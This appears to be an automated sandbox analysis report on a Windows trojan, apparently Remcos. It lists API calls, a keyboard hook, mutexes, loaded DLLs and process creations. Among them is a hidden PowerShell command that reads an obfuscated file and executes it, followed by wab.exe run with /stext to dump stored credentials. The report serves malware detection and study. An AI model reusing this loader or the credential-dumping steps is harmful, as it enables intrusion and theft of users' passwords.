              Source: wab.exe, 00000009.00000002.2292989392.0000000003468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000001.00000002.2237941604.0000000006579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, wab.exe, 0000000D.00000002.2277894057.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,9_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000007.00000002.4207090075.0000000002B5F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.000000000667C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4209917973.0000000006662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4048, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs\87tBuE42ft.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00401806 NtdllDefWindowProc_W,9_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004018C0 NtdllDefWindowProc_W,9_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00406DA00_2_00406DA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F2F0001_2_04F2F000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F2F8D01_2_04F2F8D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F2ECB81_2_04F2ECB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_07DDBB581_2_07DDBB58
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_221771947_2_22177194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_2216B5C17_2_2216B5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B0409_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0043610D9_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004473109_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044A4909_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040755A9_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0043C5609_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B6109_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044D6C09_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004476F09_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B8709_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044081D9_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004149579_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004079EE9_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00407AEB9_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044AA809_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00412AA99_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404B749_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404B039_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044BBD89_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404BE59_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404C769_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00415CFE9_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00416D729_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00446D309_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00446D8B9_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00406E8F9_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040503812_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041208C12_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004050A912_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040511A12_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043C13A12_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004051AB12_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044930012_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0040D32212_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A4F012_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043A5AB12_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041363112_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044669012_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A73012_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004398D812_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_004498E012_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0044A88612_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0043DA0912_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00438D5E12_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00449ED012_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041FE8312_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00430F5412_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004050C213_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004014AB13_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040513313_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004051A413_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040124613_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040CA4613_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040523513_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004032C813_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040168913_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00402F6013_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: 87tBuE42ft.exe, 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameformatkodens fingerstninger.exeB vs 87tBuE42ft.exe
              Source: 87tBuE42ft.exeBinary or memory string: OriginalFilenameformatkodens fingerstninger.exeB vs 87tBuE42ft.exe
              Source: 87tBuE42ft.exe.1.drBinary or memory string: OriginalFilenameformatkodens fingerstninger.exeB vs 87tBuE42ft.exe
              Source: 87tBuE42ft.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@20/17@1/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,9_2_004182CE
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,13_2_00410DE1
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,9_2_00413D4C
              Source: C:\Users\user\Desktop\87tBuE42ft.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,9_2_0040B58D
              Source: C:\Users\user\Desktop\87tBuE42ft.exeFile created: C:\Users\user\AppData\Roaming\UsitativeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-YDAEDG
              Source: C:\Users\user\Desktop\87tBuE42ft.exeFile created: C:\Users\user\AppData\Local\Temp\nst44F9.tmpJump to behavior
              Source: 87tBuE42ft.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\87tBuE42ft.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000007.00000002.4226410483.00000000225A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000009.00000002.2293159212.00000000036A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: 87tBuE42ft.exeReversingLabs: Detection: 21%
              Source: 87tBuE42ft.exeVirustotal: Detection: 33%
              Source: C:\Users\user\Desktop\87tBuE42ft.exeFile read: C:\Users\user\Desktop\87tBuE42ft.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-32948
              Source: unknownProcess created: C:\Users\user\Desktop\87tBuE42ft.exe "C:\Users\user\Desktop\87tBuE42ft.exe"
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hiugykswhvtyselocvbjhr"
              Source: C:\Users\user\Desktop\87tBuE42ft.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Frsteinstanserne\Instantiations.Lil';$Sears=$limpiness.SubString(55857,3);.$Sears($limpiness)Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mmkdxzwbxfiofkbg"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wopvxshvlnbtpypktkp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hiugykswhvtyselocvbjhr"Jump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\87tBuE42ft.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
